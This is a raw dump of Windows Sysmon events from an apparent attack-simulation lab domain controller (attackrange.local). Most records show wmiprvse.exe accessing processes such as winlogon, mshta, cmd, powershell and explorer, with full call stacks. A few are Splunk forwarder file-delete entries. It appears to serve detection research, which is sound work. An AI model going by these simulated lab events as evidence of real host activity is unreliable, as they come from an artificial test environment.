16:58:30.171{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246525Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.171{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DA1FE6047BB90818D8AFFF72D4852CC,SHA256=976DAD7D4E27289B6E691F58DD1E14D3168184BF443ED1BA51C9AEE655119A57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246524Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.140{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6E3E-603E-05AB-00000000AD01}3592C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246523Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.140{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6E3D-603E-04AB-00000000AD01}6348C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246522Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.140{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6E3D-603E-03AB-00000000AD01}6688C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246521Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.140{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246520Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.140{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246519Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.140{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246518Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.140{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246517Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.140{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FC0CED79DCCDD357FA87934909165BF,SHA256=A0D2C686940279FB0C46FF7EA17F84C71B2656AAF4DCF17AE0C6BFCF0BE0188C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246516Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.140{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246515Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246514Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246513Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246512Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246511Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246510Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246509Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 